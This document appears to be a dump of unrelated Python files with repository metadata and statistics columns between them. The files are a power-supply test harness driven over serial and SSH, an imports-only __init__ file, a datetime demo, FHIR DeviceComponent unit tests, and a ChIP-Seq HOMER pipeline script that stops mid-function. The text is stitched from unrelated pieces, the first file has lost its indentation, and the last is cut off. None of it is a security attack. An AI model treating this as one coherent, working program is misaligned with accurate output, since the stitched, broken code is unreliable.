def auxps_remove_logs(self): #
self.process_channel(".quit\r")
time.sleep(1)
self.process_channel("rm -v /var/log/AuxPS-selftest.log\r") # read dump
def auxps_bl_fw_version(self):
self.process_channel("/AUXPS/bootversion\r")
self.process_channel("/AUXPS/appversion\r")
def auxps_bl_fw_version_test(self, check_bl_against: str):
# Test BL/FW version
self._logger.info('\n-->BL/App version test<--')
self.bl_read = self.process_channel("/AUXPS/bootversion\r").split(" ")
if self.bl_read[1].find(check_bl_against) != -1:
self._logger.info(f'UUT PASSED Bootloader version test: {self.bl_read[1]}')
else:
self._logger.info(f'UUT FAILED current UUT BL version is: {self.bl_read[1]}')
return False
self.fw_read = self.process_channel("/AUXPS/appversion\r").split(" ")
self._logger.info(f'UUT current Application version is: {self.fw_read[1]}')
return True
def auxps_fault_info(self):
self.process_channel("/AUXPS/faults\r")
def auxps_bank_info(self, auxBank):
if auxBank == 'ccb':
return self.json_from_s(self.process_channel("/AUXPS/CCBChannel\r"))
if auxBank == 'pbc':
return self.json_from_s(self.process_channel("/AUXPS/PBCChannel\r"))
if auxBank == 'ext':
return self.json_from_s(self.process_channel("/AUXPS/ExtChannel\r"))
if auxBank == 'input':
return self.json_from_s(self.process_channel("/AUXPS/InputChannel\r"))
def auxps_channel_ctrl(self, ch: str, set_to: str):
    """Set an AUXPS channel state and return that bank's refreshed info.

    ch     -- 'ccb', 'pbc' or 'ext'
    set_to -- 0-3 control code (per console help: 0 enable, 1 disable)
    """
    self.process_channel(f"/AUXPS/channelCtrl {ch} {set_to}\r")
    readback = {
        'ccb': "/AUXPS/CCBChannel\r",
        'pbc': "/AUXPS/PBCChannel\r",
        'ext': "/AUXPS/ExtChannel\r",
    }.get(ch)
    if readback is not None:
        return self.json_from_s(self.process_channel(readback))
def auxps_self_test(self):
    """Trigger the AUXPS self test; required before polling auxps_fault_info()."""
    self.process_channel("/AUXPS/selfTest\r")
def auxps_shunt_ctrl(self, s_state):
    """Set the AUXPS shunt control to *s_state*."""
    self.process_channel(f"/AUXPS/shuntControl {s_state}\r")
def auxps_fan_speed(self, af_speed):
    """Set the AUXPS fan to *af_speed* (0-100); return the decoded reply."""
    reply = self.process_channel(f"/AUXPS/fanspeed {af_speed}\r")
    return self.json_from_s(reply)
def auxps_fan_info(self):
    """Return the AUXPS fan status (speed 0-100, rpm) as decoded JSON."""
    raw = self.process_channel("/AUXPS/fanstatus\r")
    return self.json_from_s(raw)
def auxps_autoPowerCycle(self, seconds):
    """Arm the AUXPS auto power-cycle timeout (<seconds>) on CAN/HB miss."""
    self.process_channel(f"/AUXPS/autoPowerCycle {seconds}\r")
    time.sleep(1)
def auxps_temps(self, humidity=False, dewpoint=False):
    """Read AUXPS temperatures as decoded JSON.

    When *humidity* / *dewpoint* are set, those queries are issued first
    (their replies are not returned, matching the original behavior).
    """
    if humidity:
        self.process_channel("/AUXPS/humidity\r")
    if dewpoint:
        self.process_channel("/AUXPS/dewpoint\r")
    return self.json_from_s(self.process_channel("/AUXPS/temps\r"))
def auxps_input_channel_info(self):
    """Return decoded info for all 3x AUXPS input channels."""
    raw = self.process_channel("/AUXPS/InputChannel\r")
    return self.json_from_s(raw)
# PM Power Control
def pm_no_detect(self):
    """Set the PBC PM node to skip MPx GPIO pin detection."""
    for cmd in ("/\r", "/PM\r", "--no-detect\r"):
        self.process_channel(cmd)
    time.sleep(1)
def pm_bl_fw_version(self, pm):
    """Query bootloader and application versions of power module *pm*."""
    self.process_channel(f"/PM/PM{pm}/bootversion\r")
    self.process_channel(f"/PM/PM{pm}/appversion\r")
# def pm_pwr_ctrl(self, pm, bus, volts, amps): # <a|b|0> <volts> <amps> [maxvolts] Set pm output bus/volts/amps
# self.process_channel("/PM/PM" + str(pm) + "/setTargets " + str(bus) + " " + str(volts) + " " + str(amps) + "\r")
# time.sleep(1)
def pm_pwr_ctrl(self, pm, bus, volts, amps):
    """Set power module *pm*'s output targets: <a|b|0> bus, volts, amps.

    Navigates to the PM node, issues setTargets, then returns to root.
    """
    for cmd in ("/\r", f"/PM/PM{pm}\r", f"setTargets {bus} {volts} {amps}\r"):
        self.process_channel(cmd)
    time.sleep(2)
    for cmd in ("\r", "/\r"):
        self.process_channel(cmd)
#### BK Test
def bk_pwr_ctrl(self, state):
    """Switch the BK supply output: 1 -> ON, 0 -> OFF.

    Note the SCPI commands end with '\n' (not the console's '\r');
    any other *state* value sends nothing.
    """
    if state in (0, 1):
        self.process_channel("OUTPut ON\n" if state == 1 else "OUTPut OFF\n")
    time.sleep(1)
# Burn-in test
def pb_bi_test(self, bus: str, volts: str, amps: str, pm1_5: bool):
    """Run the power-node burn-in test on one bus.

    pm1_5 selects the 200 kW max-power limit of PM 1.5 hardware;
    otherwise 156 kW is used.
    """
    power_kw = '200' if pm1_5 else '156'
    self.pbc_console_login()
    self.enable_ssh()
    time.sleep(1)
    for cmd in (f"test-pnode -r {bus} {power_kw}\r",
                f"test-pnode {bus} {volts} {amps}\r"):
        self.process_channel(cmd)
        time.sleep(1)
def main():
    """Ad-hoc smoke test: serial bring-up, then exercise the SSH session."""
    # BUG FIX: basicConfig(level=DEBUG) already installs a StreamHandler on
    # the root logger; the original then added a second stdout handler, so
    # every record was emitted twice.  Route basicConfig's own handler to
    # stdout instead.
    logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
    _pbc_ser = PBC_Ser('COM18')  # TODO(review): hard-coded COM port / address
    _pbc_ser.enable_ssh_2()
    _pbc_ser.close()
    _pbc_ssh = PBC_SSH('fe80::ffd2:8387:281b:1074')
    _pbc_ssh.pbc_console_login()
    _pbc_ssh.enter_chassis_shell()
    _pbc_ssh.safety_sw('reed1')
    _pbc_ssh.pbc_end_connection()
if __name__ == "__main__": main()
| 39.010664
| 123
| 0.585998
| 4,411
| 32,925
| 4.194967
| 0.077533
| 0.189905
| 0.242218
| 0.053394
| 0.926178
| 0.914505
| 0.904399
| 0.894942
| 0.893969
| 0.888348
| 0
| 0.018384
| 0.266484
| 32,925
| 843
| 124
| 39.05694
| 0.747795
| 0.165072
| 0
| 0.893092
| 0
| 0.003289
| 0.160132
| 0.028861
| 0
| 0
| 0
| 0
| 0
| 1
| 0.208882
| false
| 0.004934
| 0.013158
| 0.009868
| 0.284539
| 0.013158
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8dec709c22a5e93eb6f74d948b0cac54e47374c5
| 219
|
py
|
Python
|
mltoolkit/mldp/steps/collectors/__init__.py
|
mancunian1792/FewSum
|
c2f9ef0ae7445bdb188b6ceb28e998b3fd12b78e
|
[
"MIT"
] | 28
|
2020-10-12T19:05:22.000Z
|
2022-03-18T01:19:29.000Z
|
mltoolkit/mldp/steps/collectors/__init__.py
|
mancunian1792/FewSum
|
c2f9ef0ae7445bdb188b6ceb28e998b3fd12b78e
|
[
"MIT"
] | 1
|
2022-01-30T01:52:59.000Z
|
2022-02-19T08:04:54.000Z
|
mltoolkit/mldp/steps/collectors/__init__.py
|
mancunian1792/FewSum
|
c2f9ef0ae7445bdb188b6ceb28e998b3fd12b78e
|
[
"MIT"
] | 7
|
2020-10-29T14:01:04.000Z
|
2022-02-22T18:33:10.000Z
|
from .base_chunk_collector import BaseChunkCollector
from .unit_collector import UnitCollector
from .chunk_shuffler import ChunkShuffler
from .unit_sampler import UnitSampler
from .chunk_collector import ChunkCollector
| 36.5
| 52
| 0.885845
| 26
| 219
| 7.230769
| 0.5
| 0.239362
| 0.212766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091324
| 219
| 5
| 53
| 43.8
| 0.944724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5c0cc6faa7ef9449f54b66cb95cf7a8388ad6b84
| 220
|
py
|
Python
|
Python3/Python3_Lesson13/src/making_time.py
|
ceeblet/OST_PythonCertificationTrack
|
042e0ce964bc88b3f4132dcbd7e06c5f504eae34
|
[
"MIT"
] | null | null | null |
Python3/Python3_Lesson13/src/making_time.py
|
ceeblet/OST_PythonCertificationTrack
|
042e0ce964bc88b3f4132dcbd7e06c5f504eae34
|
[
"MIT"
] | null | null | null |
Python3/Python3_Lesson13/src/making_time.py
|
ceeblet/OST_PythonCertificationTrack
|
042e0ce964bc88b3f4132dcbd7e06c5f504eae34
|
[
"MIT"
] | null | null | null |
"""Demonstrate datetime() construction with progressively finer precision."""
from datetime import datetime

# Same date, each line adding one more time component
# (hour, minute, second, microsecond).
for time_parts in ((), (12,), (12, 30), (12, 30, 59), (12, 30, 59, 300)):
    print(datetime(2012, 10, 31, *time_parts))
| 36.666667
| 46
| 0.690909
| 39
| 220
| 3.897436
| 0.282051
| 0.427632
| 0.559211
| 0.625
| 0.809211
| 0.671053
| 0.519737
| 0.355263
| 0
| 0
| 0
| 0.317708
| 0.127273
| 220
| 6
| 46
| 36.666667
| 0.473958
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.833333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
30998ba5eb3ba2fcd7f5426a1c9836dea9daaecf
| 6,287
|
py
|
Python
|
fhir/resources/DSTU2/tests/test_devicecomponent.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 144
|
2019-05-08T14:24:43.000Z
|
2022-03-30T02:37:11.000Z
|
fhir/resources/DSTU2/tests/test_devicecomponent.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 82
|
2019-05-13T17:43:13.000Z
|
2022-03-30T16:45:17.000Z
|
fhir/resources/DSTU2/tests/test_devicecomponent.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 48
|
2019-04-04T14:14:53.000Z
|
2022-03-30T06:07:31.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timezone
from .. import fhirtypes # noqa: F401
from .. import devicecomponent
def test_DeviceComponent_1(base_settings):
    """Round-trip the prodspec DeviceComponent example through the model."""
    source = (
        base_settings["unittest_data_dir"]
        / "devicecomponent-example-prodspec.canonical.json"
    )
    parsed = devicecomponent.DeviceComponent.parse_file(
        source, content_type="application/json", encoding="utf-8"
    )
    assert "DeviceComponent" == parsed.resource_type
    impl_DeviceComponent_1(parsed)
    # Serialize and rebuild to prove dict() output is loadable again.
    payload = parsed.dict()
    assert "DeviceComponent" == payload["resourceType"]
    rebuilt = devicecomponent.DeviceComponent(**payload)
    impl_DeviceComponent_1(rebuilt)
def impl_DeviceComponent_1(inst):
    """Assert every expected field of the prodspec DeviceComponent example.

    *inst* is a parsed DeviceComponent; the literals below mirror
    devicecomponent-example-prodspec.canonical.json exactly.
    """
    # Contained device resource (#d1) and its identifiers.
    assert inst.contained[0].id == "d1"
    assert inst.contained[0].identifier[0].type.coding[0].code == "SNO"
    assert (
        inst.contained[0].identifier[0].type.coding[0].system
        == "http://hl7.org/fhir/identifier-type"
    )
    assert inst.contained[0].identifier[0].type.text == "Serial Number"
    assert inst.contained[0].identifier[0].value == "ID 13.1"
    assert inst.contained[0].identifier[1].system == "urn:iso:std:iso:11073:10101"
    assert (
        inst.contained[0].identifier[1].type.text
        == "Global Medical Device Nomenclature"
    )
    assert inst.contained[0].identifier[1].value == "2000"
    assert inst.contained[0].manufacturer == "Center4MI"
    assert inst.contained[0].model == "2-0-14"
    assert inst.contained[0].type.coding[0].code == "2000"
    assert inst.contained[0].type.coding[0].display == "MDC_DEV_ANALY_SAT_O2_MDS"
    assert inst.contained[0].type.coding[0].system == "urn:iso:std:iso:11073:10101"
    # Top-level component fields.
    assert inst.id == "example-prodspec"
    assert inst.identifier.type.text == "Handle ID"
    assert inst.identifier.value == "0"
    assert inst.languageCode.coding[0].code == "en-US"
    assert inst.languageCode.coding[0].system == "http://tools.ietf.org/html/bcp47"
    assert inst.lastSystemChange == datetime(
        2014, 10, 7, 14, 45, 0, tzinfo=timezone.utc
    )
    assert inst.operationalStatus[0].coding[0].code == "0"
    assert inst.operationalStatus[0].coding[0].display == "disconnected"
    assert inst.operationalStatus[0].coding[0].system == "urn:iso:std:iso:11073:10101"
    # Production specifications: serial, hardware, software, firmware.
    assert inst.productionSpecification[0].productionSpec == "xa-12324-b"
    assert inst.productionSpecification[0].specType.coding[0].code == "1"
    assert inst.productionSpecification[0].specType.coding[0].display == "Serial number"
    assert inst.productionSpecification[1].productionSpec == "1.1"
    assert inst.productionSpecification[1].specType.coding[0].code == "3"
    assert (
        inst.productionSpecification[1].specType.coding[0].display == "Hardware version"
    )
    assert inst.productionSpecification[2].productionSpec == "1.12"
    assert inst.productionSpecification[2].specType.coding[0].code == "4"
    assert (
        inst.productionSpecification[2].specType.coding[0].display == "Software version"
    )
    assert inst.productionSpecification[3].productionSpec == "1.0.23"
    assert inst.productionSpecification[3].specType.coding[0].code == "5"
    assert (
        inst.productionSpecification[3].specType.coding[0].display == "Firmware version"
    )
    assert inst.source.reference == "#d1"
    assert (
        inst.text.div
        == """<div>
<p>Example of a simple MDS from a pulse oximeter containment tree</p>
</div>"""
    )
    assert inst.text.status == "generated"
    assert inst.type.coding[0].code == "2000"
    assert inst.type.coding[0].display == "MDC_DEV_ANALY_SAT_O2_MDS"
    assert inst.type.coding[0].system == "urn:iso:std:iso:11073:10101"
def test_DeviceComponent_2(base_settings):
    """Round-trip the plain DeviceComponent example through the model."""
    source = (
        base_settings["unittest_data_dir"] / "devicecomponent-example.canonical.json"
    )
    parsed = devicecomponent.DeviceComponent.parse_file(
        source, content_type="application/json", encoding="utf-8"
    )
    assert "DeviceComponent" == parsed.resource_type
    impl_DeviceComponent_2(parsed)
    # Serialize and rebuild to prove dict() output is loadable again.
    payload = parsed.dict()
    assert "DeviceComponent" == payload["resourceType"]
    rebuilt = devicecomponent.DeviceComponent(**payload)
    impl_DeviceComponent_2(rebuilt)
def impl_DeviceComponent_2(inst):
    """Assert every expected field of the plain DeviceComponent example.

    *inst* is a parsed DeviceComponent; the literals below mirror
    devicecomponent-example.canonical.json exactly.
    """
    # Contained device resource (#d1) and its identifiers.
    assert inst.contained[0].id == "d1"
    assert inst.contained[0].identifier[0].type.coding[0].code == "SNO"
    assert (
        inst.contained[0].identifier[0].type.coding[0].system
        == "http://hl7.org/fhir/identifier-type"
    )
    assert inst.contained[0].identifier[0].value == "ID 13.1"
    assert inst.contained[0].identifier[1].system == "urn:iso:std:iso:11073:10101"
    assert (
        inst.contained[0].identifier[1].type.text
        == "Global Medical Device Nomenclature"
    )
    assert inst.contained[0].identifier[1].value == "2000"
    assert inst.contained[0].manufacturer == "Center4MI"
    assert inst.contained[0].model == "2-0-14"
    assert inst.contained[0].type.coding[0].code == "2000"
    assert inst.contained[0].type.coding[0].display == "MDC_DEV_ANALY_SAT_O2_MDS"
    assert inst.contained[0].type.coding[0].system == "urn:iso:std:iso:11073:10101"
    # Top-level component fields.
    assert inst.id == "example"
    assert inst.identifier.type.text == "Handle ID"
    assert inst.identifier.value == "0"
    assert inst.languageCode.coding[0].code == "en-US"
    assert inst.languageCode.coding[0].system == "http://tools.ietf.org/html/bcp47"
    assert inst.lastSystemChange == datetime(
        2014, 10, 7, 14, 45, 0, tzinfo=timezone.utc
    )
    assert inst.operationalStatus[0].coding[0].code == "0"
    assert inst.operationalStatus[0].coding[0].display == "disconnected"
    assert inst.operationalStatus[0].coding[0].system == "urn:iso:std:iso:11073:10101"
    assert inst.source.reference == "#d1"
    assert (
        inst.text.div
        == """<div>
<p>Example of a simple MDS from a pulse oximeter containment tree</p>
</div>"""
    )
    assert inst.text.status == "generated"
    assert inst.type.coding[0].code == "2000"
    assert inst.type.coding[0].display == "MDC_DEV_ANALY_SAT_O2_MDS"
    assert inst.type.coding[0].system == "urn:iso:std:iso:11073:10101"
| 42.47973
| 88
| 0.683474
| 800
| 6,287
| 5.30875
| 0.16125
| 0.157758
| 0.111844
| 0.11773
| 0.873322
| 0.873322
| 0.873322
| 0.78008
| 0.78008
| 0.78008
| 0
| 0.055014
| 0.167329
| 6,287
| 147
| 89
| 42.768707
| 0.756256
| 0.025767
| 0
| 0.664122
| 0
| 0
| 0.198529
| 0.064869
| 0
| 0
| 0
| 0
| 0.541985
| 1
| 0.030534
| false
| 0
| 0.022901
| 0
| 0.053435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb5e053339235c87de316d8c241e112b3fbc452c
| 15,575
|
py
|
Python
|
src/awsCluster/server/ChipSeqPipeline/homer_workflow/ChipSeqPipeline.py
|
AspirinCode/jupyter-genomics
|
d45526fab3de8fcc3d9fef005d4e39368ff3dfdc
|
[
"MIT"
] | 2
|
2019-01-04T08:17:27.000Z
|
2021-04-10T02:59:35.000Z
|
src/cirrus_ngs/server/deprecated/ChipSeqPipeline/homer_workflow/ChipSeqPipeline.py
|
miko-798/cirrus-ngs
|
2c005f0fe29e298652ed2164e08ada75e908229b
|
[
"MIT"
] | null | null | null |
src/cirrus_ngs/server/deprecated/ChipSeqPipeline/homer_workflow/ChipSeqPipeline.py
|
miko-798/cirrus-ngs
|
2c005f0fe29e298652ed2164e08ada75e908229b
|
[
"MIT"
] | 2
|
2021-09-10T02:57:51.000Z
|
2021-09-21T00:16:56.000Z
|
# NOTE(review): this module is Python 2 (print statements below).
__author__ = 'Guorong Xu<g1xu@ucsd.edu>'
import sys
import subprocess
import PBSTracker
import YamlFileReader
# Cluster-shared locations: pipeline scripts and downloaded sample data.
root_dir = "/shared/workspace/ChiPSeqPipeline"
data_dir = "/shared/workspace/data_archive/ChiPSeq"
## run all analysis from download, alignment, counting and differential calculation.
def run_analysis(yaml_file):
    """Drive the ChIP-Seq workflow described by *yaml_file*.

    Parses the YAML config, always downloads the inputs from S3, then runs
    each step named in the config's "analysis" list (in the fixed order
    below), and finally uploads all results back to S3.
    """
    documents = YamlFileReader.parse_yaml_file(yaml_file)
    workflow = documents.get("workflow")
    project_name = documents.get("project")
    analysis_steps = documents.get("analysis")
    s3_output_files_address = documents.get("upload")
    style = documents.get("style")  # homer peak style, "factor" or "histone" (see find_peaks)
    genome = documents.get("genome")
    sample_list = documents.get("sample")
    ## Download files from s3 and make a design group file.
    download_files(workflow, project_name, sample_list)
    if "fastqc" in analysis_steps:
        run_fastqc(workflow, project_name, sample_list)
    if "alignment" in analysis_steps:
        run_alignment(workflow, project_name, sample_list)
    if "make_tag_directory" in analysis_steps:
        make_tag_directory(workflow, project_name, sample_list)
    if "make_UCSC_file" in analysis_steps:
        make_UCSC_file(workflow, project_name, sample_list)
    if "find_peaks" in analysis_steps:
        find_peaks(workflow, project_name, sample_list, style)
    if "annotate_peaks" in analysis_steps:
        annotate_peaks(workflow, project_name, sample_list, style, genome)
    if "pos2bed" in analysis_steps:
        pos2bed(workflow, project_name, sample_list, style)
    if "find_motifs_genome" in analysis_steps:
        find_motifs_genome(workflow, project_name, sample_list, style, genome)
    ## Upload resulting files to s3.
    upload_files(workflow, project_name, s3_output_files_address)
    print "======================================================"
    print "The processing of the project \"" + project_name + "\" is done!"
    print "======================================================"
## download file from s3
def download_files(workflow, project_name, sample_list):
    """Queue a qsub download.sh job per sample file, then wait on the queue.

    Paired samples arrive as one "name1, name2" string; the slice at
    find(",") + 2 skips the comma and one space — assumes exactly
    ", " as the separator (TODO confirm upstream format).
    """
    workspace = root_dir + "/" + workflow + "/scripts/"
    sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
    print "executing download files..."
    ##copying data from s3 to local drive
    for sample_file in sample_list:
        if sample_file.get("filename").find(",") > -1:
            # Paired: one qsub job per mate.
            sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
            sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
            subprocess.call(["qsub", workspace + "download.sh", sample_file.get("download"),
                             sample_1, sample_dir])
            subprocess.call(["qsub", workspace + "download.sh", sample_file.get("download"),
                             sample_2, sample_dir])
        else:
            subprocess.call(["qsub", workspace + "download.sh", sample_file.get("download"),
                             sample_file.get("filename"), sample_dir])
    # Block until all queued "download" jobs finish.
    PBSTracker.trackPBSQueue(1, "download")
## running fastqc for all samples
def run_fastqc(workflow, project_name, sample_list):
    """Queue a qsub fastqc.sh job per sample fastq, then wait on the queue.

    Output names are derived by replacing ".fastq" with "_fastqc.zip".
    """
    workspace = root_dir + "/" + workflow + "/scripts/"
    sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
    print "executing fastqc..."
    for sample_file in sample_list:
        if sample_file.get("filename").find(",") > -1:
            # Paired: one fastqc job per mate.
            sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
            sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
            output_file = sample_1.replace(".fastq", "_fastqc.zip")
            subprocess.call(["qsub", workspace + "fastqc.sh", sample_dir + sample_1,
                             sample_dir + output_file])
            output_file = sample_2.replace(".fastq", "_fastqc.zip")
            subprocess.call(["qsub", workspace + "fastqc.sh", sample_dir + sample_2,
                             sample_dir + output_file])
        else:
            output_file = sample_file.get("filename").replace(".fastq", "_fastqc.zip")
            subprocess.call(["qsub", workspace + "fastqc.sh", sample_dir + sample_file.get("filename"),
                             sample_dir + output_file])
    PBSTracker.trackPBSQueue(1, "fastqc")
## executing ChipSeq Sequencing alignment
def run_alignment(workflow, project_name, sample_list):
    """Queue a 4-slot (qsub -pe smp 4) alignment.sh job per sample fastq."""
    workspace = root_dir + "/" + workflow + "/scripts/"
    sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
    print "executing alignment..."
    for sample_file in sample_list:
        if sample_file.get("filename").find(",") > -1:
            # Paired: align each mate independently.
            sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
            sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
            subprocess.call(["qsub", "-pe", "smp", "4", workspace + "alignment.sh", sample_dir + sample_1])
            subprocess.call(["qsub", "-pe", "smp", "4", workspace + "alignment.sh", sample_dir + sample_2])
        else:
            subprocess.call(["qsub", "-pe", "smp", "4", workspace + "alignment.sh", sample_dir + sample_file.get("filename")])
    PBSTracker.trackPBSQueue(1, "alignment")
## make tag directory
def make_tag_directory(workflow, project_name, sample_list):
    """Queue homer make_tag_directory.sh jobs over the aligned .sam files.

    The tag-folder name is the sample name with its ".fastq" extension
    stripped ([:-6] drops the 6-char suffix).
    """
    workspace = root_dir + "/" + workflow + "/scripts/"
    sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
    print "executing make_tag_directory..."
    for sample_file in sample_list:
        if sample_file.get("filename").find(",") > -1:
            sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
            sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
            input_file = sample_1.replace(".fastq", ".fastq.sam")
            output_tag_folder = sample_1[:-6]
            subprocess.call(["qsub", workspace + "make_tag_directory.sh",
                             sample_dir + output_tag_folder, sample_dir + input_file])
            input_file = sample_2.replace(".fastq", ".fastq.sam")
            output_tag_folder = sample_2[:-6]
            subprocess.call(["qsub", workspace + "make_tag_directory.sh",
                             sample_dir + output_tag_folder, sample_dir + input_file])
        else:
            input_file = sample_file.get("filename").replace(".fastq", ".fastq.sam")
            output_tag_folder = sample_file.get("filename")[:-6]
            subprocess.call(["qsub", workspace + "make_tag_directory.sh",
                             sample_dir + output_tag_folder, sample_dir + input_file])
    PBSTracker.trackPBSQueue(1, "make_tag")
## make UCSC file
def make_UCSC_file(workflow, project_name, sample_list):
    """Queue make_UCSC_file.sh jobs over each sample's tag folder.

    Tag folder = sample name minus the ".fastq" extension ([:-6]).
    """
    workspace = root_dir + "/" + workflow + "/scripts/"
    sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
    print "executing make_UCSC_directory..."
    for sample_file in sample_list:
        if sample_file.get("filename").find(",") > -1:
            sample_1 = sample_file.get("filename")[:sample_file.get("filename").find(",")]
            sample_2 = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:]
            input_tag_folder = sample_1[:-6]
            subprocess.call(["qsub", workspace + "make_UCSC_file.sh", sample_dir + input_tag_folder])
            input_tag_folder = sample_2[:-6]
            subprocess.call(["qsub", workspace + "make_UCSC_file.sh", sample_dir + input_tag_folder])
        else:
            input_tag_folder = sample_file.get("filename")[:-6]
            subprocess.call(["qsub", workspace + "make_UCSC_file.sh", sample_dir + input_tag_folder])
    PBSTracker.trackPBSQueue(1, "make_UCSC")
## find peaks
def find_peaks(workflow, project_name, sample_list, style):
    """Queue homer find_peaks.sh jobs per sample (or chip-vs-input pair).

    style "factor" writes peaks.txt, "histone" writes regions.txt; any
    other style queues nothing.  A comma in the filename means
    "chip, input" — results go to a "<chip>_vs_<input>" folder.
    """
    workspace = root_dir + "/" + workflow + "/scripts/"
    sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
    print "executing find_peaks..."
    for sample_file in sample_list:
        if sample_file.get("filename").find(",") < 0:
            # Single sample: peak-call against the tag folder alone.
            chip_tag_folder = sample_file.get("filename")[:-6]
            if style == "factor":
                output_peak_file = chip_tag_folder + "/peaks.txt"
                subprocess.call(["qsub", workspace + "find_peaks.sh", sample_dir + chip_tag_folder, style,
                                 sample_dir + output_peak_file])
            if style == "histone":
                output_peak_file = chip_tag_folder + "/regions.txt"
                subprocess.call(["qsub", workspace + "find_peaks.sh", sample_dir + chip_tag_folder, style,
                                 sample_dir + output_peak_file])
        else:
            chip_tag_folder = sample_file.get("filename")[:sample_file.get("filename").find(",")][:-6]
            input_tag_folder = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:][:-6]
            # Debug trace of the pair being processed.
            print chip_tag_folder
            print input_tag_folder
            if style == "factor":
                output_peak_file = chip_tag_folder + "_vs_" + input_tag_folder + "/peaks.txt"
                subprocess.call(["qsub", workspace + "find_peaks.sh", sample_dir + chip_tag_folder, style,
                                 sample_dir + output_peak_file, sample_dir + input_tag_folder])
            if style == "histone":
                output_peak_file = chip_tag_folder + "_vs_" + input_tag_folder + "/regions.txt"
                subprocess.call(["qsub", workspace + "find_peaks.sh", sample_dir + chip_tag_folder, style,
                                 sample_dir + output_peak_file, sample_dir + input_tag_folder])
    PBSTracker.trackPBSQueue(1, "find_peaks")
## annotate peaks
def annotate_peaks(workflow, project_name, sample_list, style, genome):
    """Queue annotate_peaks.sh over each sample's peaks/regions file.

    Mirrors find_peaks' layout: "factor" -> peaks.txt, "histone" ->
    regions.txt, paired samples under "<chip>_vs_<input>".
    """
    workspace = root_dir + "/" + workflow + "/scripts/"
    sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
    print "executing annotate_peaks..."
    for sample_file in sample_list:
        if sample_file.get("filename").find(",") < 0:
            input_tag_folder = sample_file.get("filename")[:-6]
            if style == "factor":
                subprocess.call(["qsub", workspace + "annotate_peaks.sh", sample_dir + input_tag_folder + "/peaks.txt",
                                 sample_dir + input_tag_folder + "/peaks.annotate.txt", input_tag_folder, genome])
            if style == "histone":
                subprocess.call(["qsub", workspace + "annotate_peaks.sh", sample_dir + input_tag_folder + "/regions.txt",
                                 sample_dir + input_tag_folder + "/regions.annotate.txt", input_tag_folder, genome])
        else:
            chip_tag_folder = sample_file.get("filename")[:sample_file.get("filename").find(",")][:-6]
            input_tag_folder = sample_file.get("filename")[sample_file.get("filename").find(",") + 2:][:-6]
            group_tag_folder = chip_tag_folder + "_vs_" + input_tag_folder
            if style == "factor":
                subprocess.call(["qsub", workspace + "annotate_peaks.sh", sample_dir + group_tag_folder + "/peaks.txt",
                                 sample_dir + group_tag_folder + "/peaks.annotate.txt", sample_dir + group_tag_folder, genome])
            if style == "histone":
                subprocess.call(["qsub", workspace + "annotate_peaks.sh", sample_dir + group_tag_folder + "/regions.txt",
                                 sample_dir + group_tag_folder + "/regions.annotate.txt", sample_dir + group_tag_folder, genome])
    PBSTracker.trackPBSQueue(1, "annotate_p")
## pos2bed
def pos2bed(workflow, project_name, sample_list, style):
workspace = root_dir + "/" + workflow + "/scripts/"
sample_dir = data_dir + "/" + project_name + "/" + workflow + "/"
print "executing pos2bed..."
for sample_file in sample_list:
if sample_file.get("filename").find(",") < 0:
input_tag_folder = sample_file[:-6]
if style == "factor":
subprocess.call(["qsub", workspace + "pos2bed.sh", sample_dir + input_tag_folder + "/peaks.txt",
sample_dir + input_tag_folder + "/output.bed"])
if style == "histone":
